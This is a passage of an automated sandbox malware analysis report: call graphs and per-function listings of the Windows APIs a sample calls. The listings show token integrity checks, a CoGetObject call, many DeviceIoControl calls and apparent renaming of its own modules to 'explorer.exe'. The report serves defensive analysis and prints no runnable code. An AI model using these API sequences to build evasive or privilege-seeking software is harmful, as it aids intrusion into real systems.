                                                                                                                                                                                                                                                                                                                                                                  callgraph 0 Function_006A1E69 1 Function_006949ED 2 Function_006970EC 37 Function_0069592F 2->37 3 Function_006957EE 62 Function_0069571F 3->62 4 Function_0069C2EE 5 Function_006943E0 8 Function_00694A78 5->8 14 Function_00696948 5->14 25 Function_00696950 5->25 6 Function_006C5FE7 6->2 30 Function_00696254 6->30 32 Function_006959A8 6->32 35 Function_006C5FAA 6->35 7 Function_0069E662 8->14 9 Function_00699BFC 12 Function_00695DF0 9->12 10 Function_0069C1FC 10->0 49 Function_006A1E88 10->49 11 Function_00695AF1 11->62 13 Function_00695848 27 Function_0069B255 13->27 13->30 41 Function_00695926 13->41 58 Function_00696299 13->58 61 Function_0069591D 13->61 64 Function_00696610 13->64 15 Function_0069CF4A 16 Function_00699BCC 17 Function_0069C34F 18 Function_0069C4C0 19 Function_00696640 34 Function_00696CAD 19->34 54 Function_00696B02 19->54 19->62 20 Function_0069D2C2 36 Function_00694A2F 20->36 38 Function_0069452F 20->38 21 Function_00694A42 21->37 22 Function_006951D9 23 Function_00694ADD 44 Function_00699ABF 23->44 24 Function_006950D0 39 Function_0069CFA1 25->39 26 Function_0069C550 26->18 53 Function_0069C500 26->53 28 Function_00696155 28->36 28->38 29 Function_00694A55 29->1 29->21 29->36 31 Function_0069C3D6 31->31 32->19 32->37 33 Function_006C6028 33->3 33->6 33->13 33->26 33->29 33->32 33->33 33->36 33->38 43 Function_006957BA 33->43 48 Function_006957B4 33->48 52 Function_00696481 33->52 56 Function_00694A87 33->56 60 Function_0069579A 33->60 34->20 34->54 35->2 35->11 35->26 35->30 35->32 35->35 35->37 36->37 37->13 37->43 37->52 37->56 37->62 38->14 38->62 39->39 40 Function_006956A4 40->64 41->44 42 Function_0069C338 42->10 43->62 45 Function_0069D030 45->40 45->62 65 Function_00695716 45->65 46 Function_006962B0 46->4 46->8 46->26 46->42 55 Function_0069C305 46->55 63 Function_0069C31E 46->63 47 Function_0069C333 50 Function_0069D20D 50->36 50->38 51 Function_0069C28C 51->8 51->10 54->5 54->20 54->24 54->28 54->45 54->50 59 Function_0069D199 54->59 55->0 56->1 56->9 56->16 56->23 56->30 56->36 56->58 57 Function_0069B707 57->22 57->30 57->58 59->36 59->38 61->44 62->64 65->40

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00694A87 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 00694AB0
                                                                                                                                                                                                                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 00694ABF
                                                                                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9db0c556acab1491db248113d37050be2404d0ef9ce48b7016d2b94a45aa8b63
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db0c556acab1491db248113d37050be2404d0ef9ce48b7016d2b94a45aa8b63
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 006C5FE7 Relevance: 4.5, APIs: 3, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 26 6c5fe7-6c601b call 696254 call 6959a8 call 6c5faa call 6970ec
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                                                                                                                                                                                                                  • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1003287236-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00694A78 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006999D2
                                                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
                                                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00699A15
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:7.1%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:6.1%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:310
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                                                                                                                                                                                                                                                  execution_graph 4607 409e81 4610 40537d 4607->4610 4608 409e9f 4609 40299a 8 API calls 4609->4610 4610->4608 4610->4609 4611 40e9a4 8 API calls 4610->4611 4611->4610 4680 404dc4 HeapAlloc 4634 408146 4635 4081d7 4634->4635 4636 408203 SetFilePointer 4635->4636 4637 4040d7 ReadFile 4636->4637 4638 4040fa 4636->4638 4637->4638 4639 40af49 4640 40b349 4639->4640 4641 4078cc 4640->4641 4642 401f06 GetTickCount 4640->4642 4643 40b358 4642->4643 4447 40e24c 4448 40e1d7 4447->4448 4450 409b06 4447->4450 4451 40e9cc 4450->4451 4453 407ea6 4450->4453 4456 404753 4450->4456 4454 408e10 4453->4454 4461 404b6e 4454->4461 4458 401db8 4456->4458 4457 40e95d 4458->4457 4483 402d2d 4458->4483 4462 40c1d3 4461->4462 4469 404b7e 4461->4469 4478 40aba2 4462->4478 4464 404da9 4470 40dfb7 4464->4470 4465 40b6f9 4474 40ccc4 4465->4474 4468 404dba 4468->4454 4469->4464 4469->4465 4471 40dfec 4470->4471 4472 40e14a DeviceIoControl 4471->4472 4473 40e1d7 4472->4473 4473->4468 4475 402ec4 4474->4475 4476 40ccf3 4474->4476 4475->4468 4476->4475 4477 40dbaf DeviceIoControl 4476->4477 4477->4475 4479 40abbc 4478->4479 4480 40abdb SetFilePointer 4479->4480 4481 40c612 WriteFile 4480->4481 4482 4021e9 4480->4482 4481->4482 4482->4468 4488 402d3d 4483->4488 4490 408944 4483->4490 4487 402d57 4495 40b485 4487->4495 4488->4487 4491 4090aa 4488->4491 4498 4081ca 4490->4498 4492 4090df 4491->4492 4493 40923d DeviceIoControl 4492->4493 4494 4092c7 4493->4494 4494->4487 4496 40b4cd 4495->4496 4497 40b59b DeviceIoControl 4496->4497 4497->4490 4499 4081d7 4498->4499 4500 408203 SetFilePointer 4499->4500 4501 4040d7 ReadFile 4500->4501 4502 4040fa 4500->4502 4501->4502 4560 402ecd 4562 408e10 4560->4562 4561 404b6e 4 API calls 4561->4562 4562->4561 4612 40e48d NtQuerySystemInformation 4613 40e4b0 4612->4613 4614 408cf4 4612->4614 4614->4612 4503 404e4e 4505 401db8 4503->4505 4504 40e95d 4505->4504 4506 402d2d 4 API calls 4505->4506 4507 401dcf 4506->4507 4685 4063ce 4686 4063d2 4685->4686 4687 405c4c 8 API calls 4686->4687 4688 4063d7 4687->4688 4689 405312 4 API calls 4688->4689 4692 4025ff 4688->4692 4689->4692 4690 40a943 ExitProcess 4691 40cd02 4690->4691 4692->4690 4563 4040d0 ReadFile 4564 4040fa 4563->4564 4644 408951 4645 408962 CreateFileA DeviceIoControl 4644->4645 4646 4047e0 4645->4646 4647 401352 4648 40136b 4647->4648 4649 401384 VirtualProtect 4648->4649 4703 408193 4704 4081a0 4703->4704 4706 4081f5 4703->4706 4705 408203 SetFilePointer 4707 4040d7 ReadFile 4705->4707 4708 4040fa 4705->4708 4706->4705 4707->4708 4650 40a554 4651 40a536 LoadLibraryA 4650->4651 4652 40a530 4650->4652 4651->4652 4652->4651 4653 402b51 4652->4653 4709 40c595 4711 404bcc 4709->4711 4710 404e2b 4711->4710 4712 404ba6 4 API calls 4711->4712 4712->4711 4713 408795 4714 40336b 4713->4714 4716 406ef1 4713->4716 4715 404b6e 4 API calls 4715->4716 4716->4714 4716->4715 4664 402f17 wvsprintfW 4654 408958 CreateFileA DeviceIoControl 4655 4047e0 4654->4655 4439 402b19 4441 402b21 4439->4441 4440 40323a 4441->4440 4443 409727 4441->4443 4444 40211b 4443->4444 4445 402106 4443->4445 4444->4441 4445->4444 4446 40d1eb CoGetObject 4445->4446 4446->4441 4555 408619 4556 40867a 4555->4556 4557 40861d wvsprintfA 4555->4557 4693 4021da 4694 4021dc 4693->4694 4694->4693 4695 404416 GetModuleHandleA 4694->4695 4696 40443f 4695->4696 4511 40665c 4512 40666b 4511->4512 4514 40ed17 4512->4514 4515 40afd6 4512->4515 4516 40b349 4515->4516 4517 4078cc 4516->4517 4520 401f06 4516->4520 4517->4512 4519 40b358 4519->4512 4523 409dfb 4520->4523 4522 401f1f GetTickCount 4522->4519 4523->4522 4565 402adc 4566 402b01 4565->4566 4568 402b11 4566->4568 4572 40299a 4566->4572 4569 40299a 8 API calls 4570 4030fc 4569->4570 4570->4568 4570->4569 4578 40e9a4 4570->4578 4573 4029dc 4572->4573 4574 40b83f 8 API calls 4573->4574 4575 4011c6 4574->4575 4577 4011de 4575->4577 4583 40b83f 4575->4583 4577->4570 4579 404753 4 API calls 4578->4579 4582 409b06 4579->4582 4580 40e9cc 4581 407ea6 4 API calls 4581->4582 4582->4578 4582->4580 4582->4581 4584 40b85d 4583->4584 4585 404753 4 API calls 4584->4585 4586 407dc3 4585->4586 4587 407ea6 4 API calls 4586->4587 4588 406b98 4586->4588 4587->4588 4588->4577 4717 404d9e 4718 404da9 4717->4718 4719 40dfb7 DeviceIoControl 4718->4719 4720 404dba 4719->4720 4350 40dde0 4351 40ddf9 4350->4351 4354 40b2e4 4351->4354 4361 401b95 4354->4361 4356 40b2fe 4365 4069bb 4356->4365 4358 40b313 4369 403375 4358->4369 4362 401baa 4361->4362 4363 40cdfb 4362->4363 4364 40135e VirtualProtect 4362->4364 4363->4356 4364->4362 4366 4069ce 4365->4366 4367 402b51 4366->4367 4368 40a536 LoadLibraryA 4366->4368 4367->4358 4368->4366 4372 40693d 4369->4372 4371 40337d 4373 4046b0 4372->4373 4374 40a2f3 4373->4374 4377 40aea4 GetPEB 4373->4377 4374->4371 4395 40d1f6 GetModuleHandleA 4377->4395 4379 40aeb6 4380 401bd2 4379->4380 4401 404369 GetModuleFileNameW CoInitialize 4379->4401 4382 4044bc 4380->4382 4383 401bdf 4380->4383 4412 403aee CreateMutexW GetLastError 4382->4412 4383->4371 4396 40d219 4395->4396 4397 40d329 LoadLibraryA 4396->4397 4398 40d351 4397->4398 4399 40d39b LoadLibraryA 4398->4399 4400 40d3c4 4399->4400 4400->4379 4414 409543 4401->4414 4406 4043a3 4406->4380 4407 405c4c 8 API calls 4408 4063d7 4407->4408 4411 4025ff 4408->4411 4432 405312 4408->4432 4410 40a943 ExitProcess 4410->4406 4411->4410 4413 403b17 4412->4413 4415 409551 4414->4415 4416 409565 GetWindowsDirectoryW 4415->4416 4417 404393 4416->4417 4418 409587 4416->4418 4422 405c4c 4417->4422 4418->4417 4419 4095b9 NtAllocateVirtualMemory 4418->4419 4419->4417 4420 4095f4 4419->4420 4421 409606 EnterCriticalSection RtlInitUnicodeString RtlInitUnicodeString LeaveCriticalSection LdrEnumerateLoadedModules 4420->4421 4421->4417 4423 409c8c OpenProcessToken 4422->4423 4424 407a51 GetTokenInformation 4423->4424 4425 401071 4423->4425 4426 407a69 LocalAlloc GetTokenInformation 4424->4426 4428 401240 FindCloseChangeNotification 4425->4428 4429 403bc5 4425->4429 4426->4425 4427 40103c GetSidSubAuthorityCount GetSidSubAuthority 4426->4427 4427->4423 4427->4425 4428->4429 4430 40294f 4429->4430 4431 403bcf LocalFree 4429->4431 4430->4406 4430->4407 4431->4430 4433 405325 4432->4433 4436 408392 4432->4436 4434 408337 RtlInitUnicodeString RtlExpandEnvironmentStrings_U 4433->4434 4435 408385 4434->4435 4434->4436 4435->4436 4437 4037e4 RtlNtStatusToDosError RtlRestoreLastWin32Error 4435->4437 4438 403c36 4437->4438 4438->4411 4615 4050a2 4616 4050be RtlInitUnicodeString RtlInitUnicodeString 4615->4616 4617 4043bc 4615->4617 4616->4617 4665 402322 4667 40232c 4665->4667 4666 402339 4667->4666 4668 40b59b DeviceIoControl 4667->4668 4589 402ee4 4592 404ba6 4589->4592 4591 402f02 4593 40aed0 4592->4593 4594 404bc0 4592->4594 4595 404753 4 API calls 4594->4595 4596 407e63 4595->4596 4596->4591 4721 401fa5 4722 408de0 4721->4722 4723 40b59b DeviceIoControl 4722->4723 4558 408627 wvsprintfA 4669 40932a 4670 4046b0 4669->4670 4671 40a2f3 4670->4671 4672 40aea4 36 API calls 4670->4672 4673 4046b5 4672->4673 4597 40e4f0 4599 408e10 4597->4599 4598 404b6e 4 API calls 4598->4599 4599->4597 4599->4598 4600 406ef1 4603 4087a6 4600->4603 4601 40336b 4602 404b6e 4 API calls 4602->4603 4603->4600 4603->4601 4603->4602 4524 403072 4533 40895b CreateFileA DeviceIoControl 4524->4533 4527 40880d DeviceIoControl 4528 409e38 4527->4528 4532 4030b2 4527->4532 4542 40bdea 4528->4542 4530 403d94 4530->4532 4535 40acfc 4530->4535 4534 40307e CreateFileA 4533->4534 4534->4527 4534->4532 4536 402d2d 4 API calls 4535->4536 4537 40ad23 4536->4537 4538 404b6e 4 API calls 4537->4538 4539 407e9a 4538->4539 4540 404b6e 4 API calls 4539->4540 4541 4080f4 4540->4541 4541->4532 4545 406bae 4542->4545 4546 406bd2 4545->4546 4547 40b485 DeviceIoControl 4546->4547 4548 402d86 4547->4548 4548->4530 4618 4082b6 AllocateAndInitializeSid 4619 404853 4618->4619 4620 40483b CheckTokenMembership 4618->4620 4621 40aa98 FreeSid 4619->4621 4620->4619 4620->4621 4674 406137 4675 40cda2 LoadLibraryA 4674->4675 4676 406146 4674->4676 4677 40cdca 4675->4677 4676->4674 4697 4059f8 4698 405a03 4697->4698 4701 40158c DeviceIoControl 4698->4701 4700 405a0b 4702 401253 4701->4702 4702->4700 4622 407ab9 4623 407a69 LocalAlloc GetTokenInformation 4622->4623 4627 401ea5 4622->4627 4624 401071 4623->4624 4625 40103c GetSidSubAuthorityCount GetSidSubAuthority 4623->4625 4629 401240 FindCloseChangeNotification 4624->4629 4630 403bc5 4624->4630 4625->4624 4626 409c8c OpenProcessToken 4625->4626 4626->4624 4628 407a51 GetTokenInformation 4626->4628 4628->4623 4629->4630 4631 40294f 4630->4631 4632 403bcf LocalFree 4630->4632 4632->4631 4678 407539 GetModuleHandleW GetProcessHeap HeapAlloc 4679 403c07 4678->4679 4656 40197b 4657 404ba6 4 API calls 4656->4657 4659 40198e 4657->4659 4658 404ba6 4 API calls 4658->4659 4659->4658 4660 401999 4659->4660 4633 40bcbd GetProcessHeap HeapFree 4559 40803e GetProcessHeap HeapAlloc 4549 40aa7f 4550 40c2f6 LocalAlloc 4549->4550 4551 40aa8e 4549->4551 4550->4551 4604 406eff 4605 40b146 LocalFree 4604->4605 4606 406f0e 4604->4606 4605->4606 4661 40d17f 4662 40d1eb CoGetObject 4661->4662 4663 40d183 4661->4663 4663->4662

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00409543 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78memorylibrarynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000180,00600000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000178,00600000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitSectionStringUnicode$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3728205514-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3c5517ac64ebe0f4a93bb8fcf9093c65cacff95b6910bca11f849b0b04bbd4d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F3195B5940208EBC704DF90DCC5FA97775AB48305F1081BAFA05672D1E7B8AE85CB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040AEA4 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 189 40aea4-40aec0 GetPEB call 40d1f6 192 401bd2-401bd9 call 40c13c 189->192 193 40aec6 call 404369 189->193 198 4044bc-4044c3 call 403aee 192->198 199 401bdf 192->199 197 40aecb 193->197 197->192 203 4044c9 198->203 204 40a95e-40a96a call 4043ad call 407d21 198->204 200 40bfa2-40bfa5 199->200 203->200 209 40a970-40a980 Sleep call 4023f2 204->209 210 402b44-402b46 ExitProcess 204->210 209->210
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Module$FileHandleInitializeLibraryLoadName
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1691763914-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d1e830cd534af54437783b51cc9c08bc841a27dcc6edcfaa80d65915427b13e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b20ac1345fbffd2ee6b09d0fcfa97f88ae309217d757d61775f2d603f36cc11d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d1e830cd534af54437783b51cc9c08bc841a27dcc6edcfaa80d65915427b13e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BF0BE70608345D6C6047FB38E4672A76B8AF0030DF10407FFD02B62D2EA7E9A11559F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00405C4C Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A5F
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
